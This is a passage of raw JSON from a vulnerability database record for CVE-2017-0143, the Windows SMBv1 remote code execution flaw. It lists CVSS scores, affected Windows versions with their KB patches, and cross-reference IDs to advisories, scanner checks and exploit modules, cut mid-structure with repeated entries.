"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB4012213", "KB4012606", "KB4012216", "KB4012598", "KB4013198", "KB3212646", "KB4013429", "KB3213986", "KB3210720", "KBMS16-110, 3187754", "KB3210721", "KB3177186", "KB3205409", "KB4012212", "KB4012217", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-04T22:46:36", "differentElements": ["msAffectedSoftware"], "edition": 87}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "0af4fa0c2d2e9ecbee64838f6a9ee483", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-10-06T08:45:17", "history": [], "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012216", "KB4013198", "KB4012214", "KB3213986", "KB4012212", "KB3210721", "KB4012606", "KB4013429", "KB3210720", "KB3205409", "KB3212646", "KB3205401", "KB4012215", "KB4012598", "KB4012213", "KB4012217", "KB3177186", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {"baseScore": "8.1", "temporalScore": "7.3", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C"}}, "lastseen": "2021-10-06T08:45:17", "differentElements": ["msAffectedSoftware"], "edition": 88}], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0177"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:156196"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-10-06T10:49:13", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-06T10:49:13", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012606", "KB3212646", "KB4012215", "KB3205409", "KB4012216", "KB4012213", "KB3177186", "KB3213986", "KB4012217", "KB3205401", "KB4012212", "KB4012598", "KBMS16-110, 3187754", "KB4012214", "KB3210720", "KB3210721", "KB4013429", "KB4013198"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": 